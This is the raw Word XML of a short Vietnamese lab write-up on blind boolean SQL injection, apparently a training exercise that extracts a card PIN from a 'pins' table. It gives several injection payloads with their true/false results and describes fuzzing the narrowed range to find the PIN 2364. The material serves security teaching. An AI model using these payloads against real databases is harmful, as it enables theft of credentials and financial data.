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D161" w14:textId="6C278F37" w:rsidR="00BF3DDA" w:rsidRDefault="00DA7A2B">
      <w:r w:rsidRPr="002164E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Khi dò mù và dùng phép toán AND thì Đúng and Đúng sẽ cho ra kết quả là isValid. Đúng và Sai sẽ là inValid. Hacker sẽ lợi dụng Response dạng này để mò bằng SQL Injection. Chúng sẽ thử từng kq và xem Response xem là T hay F. sau đó dò ra được kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE30F5" w14:textId="339AB934" w:rsidR="00DA7A2B" w:rsidRPr="002164E1" w:rsidRDefault="00DA7A2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002164E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiến hành:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BFDF46" w14:textId="477CC90E" w:rsidR="00DA7A2B" w:rsidRDefault="00DA7A2B">
      <w:r>
        <w:t>Ta thử từng phép toán xem Pin sẽ rơi &gt; bao nhiêu và giảm dần số lượng để khoanh vùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939FDEC" w14:textId="393B5A7B" w:rsidR="00DA7A2B" w:rsidRDefault="00DA7A2B">
      <w:r w:rsidRPr="00DA7A2B">
        <w:t>101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') &gt; 10000 );</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188EF3E" w14:textId="31AEE2D7" w:rsidR="00DA7A2B" w:rsidRDefault="00DA7A2B" w:rsidP="00DA7A2B">
      <w:r w:rsidRPr="00DA7A2B">
        <w:t xml:space="preserve">101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') &gt; </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A2B">
        <w:t>000 );</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D412C9F" w14:textId="61339975" w:rsidR="00DA7A2B" w:rsidRDefault="00DA7A2B" w:rsidP="00DA7A2B">
      <w:r w:rsidRPr="00DA7A2B">
        <w:t xml:space="preserve">101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') &gt; </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A2B">
        <w:t>000 );</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C18AF40" w14:textId="00DD8446" w:rsidR="00DA7A2B" w:rsidRDefault="00DA7A2B" w:rsidP="00DA7A2B">
      <w:r w:rsidRPr="00DA7A2B">
        <w:t xml:space="preserve">101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') &gt; </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A2B">
        <w:t>000 );</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D281099" w14:textId="05254EC1" w:rsidR="00C03A02" w:rsidRDefault="00C03A02" w:rsidP="00DA7A2B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="034AFE6F" wp14:editId="5BCCD05B">
            <wp:extent cx="3109844" cy="17492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9815" cy="1754896"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4825AD36" w14:textId="519DF849" w:rsidR="002164E1" w:rsidRDefault="002164E1" w:rsidP="002164E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pin sẽ lớn hơn 2000 và bé hơn hoặc bằng 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344AE5BB" w14:textId="5B62137D" w:rsidR="002164E1" w:rsidRDefault="002164E1" w:rsidP="002164E1">
      <w:r>
        <w:t>Tiếp theo ta sẽ dùng chức năng Puzzer để quét vùng vừa tra được để tìm kiếm kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9299D8" w14:textId="2DB6A22D" w:rsidR="00C03A02" w:rsidRDefault="00C03A02" w:rsidP="002164E1">
      <w:r>
        <w:t xml:space="preserve">Trước tiên ta sẽ sinh ra các giá trị từ 2001 </w:t>
      </w:r>
      <w:r w:rsidR="00351203">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DED5C1" w14:textId="75665B35" w:rsidR="00351203" w:rsidRDefault="00351203" w:rsidP="002164E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="116BDB04" wp14:editId="78F54BB5">
            <wp:extent cx="3017961" cy="1697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288" cy="1701725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C5F537" w14:textId="5243D598" w:rsidR="00351203" w:rsidRDefault="00351203" w:rsidP="002164E1">
      <w:r>
        <w:t>Tiếp theo tiến hành Puzzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F660821" w14:textId="7D697E32" w:rsidR="00351203" w:rsidRDefault="00351203" w:rsidP="002164E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32371D93" wp14:editId="313FF36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31B44D1" w14:textId="376715CB" w:rsidR="00351203" w:rsidRDefault="00351203" w:rsidP="002164E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75343B02" wp14:editId="476D500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8BBCD30" w14:textId="03191B25" w:rsidR="00351203" w:rsidRDefault="00351203" w:rsidP="002164E1">
      <w:r>
        <w:t>Kết quả là 2364</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657536FD" w14:textId="77777777" w:rsidR="00351203" w:rsidRDefault="00351203" w:rsidP="002164E1"/>
    <w:p w14:paraId="47F79A0B" w14:textId="77777777" w:rsidR="00C03A02" w:rsidRDefault="00C03A02" w:rsidP="002164E1"/>
    <w:p w14:paraId="139311A5" w14:textId="77777777" w:rsidR="00DA7A2B" w:rsidRDefault="00DA7A2B" w:rsidP="00DA7A2B"/>
    <w:p w14:paraId="4E6DEA20" w14:textId="77777777" w:rsidR="00DA7A2B" w:rsidRDefault="00DA7A2B" w:rsidP="00DA7A2B"/>
    <w:p w14:paraId="5E4316DB" w14:textId="77777777" w:rsidR="00DA7A2B" w:rsidRDefault="00DA7A2B"/>
    <w:sectPr w:rsidR="00DA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E79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7FB4A40A"/>
    <w:lvl w:ilvl="0" w:tplc="C42AF1EC">
      <w:start w:val="1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5D"/>
    <w:rsid w:val="002164E1"/>
    <w:rsid w:val="00351203"/>
    <w:rsid w:val="008B125D"/>
    <w:rsid w:val="00BF3DDA"/>
    <w:rsid w:val="00C03A02"/>
    <w:rsid w:val="00DA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5255"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DCA20CE5-0611-4AE7-8658-5C008DF7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2020-05-25T03:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-25T03:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>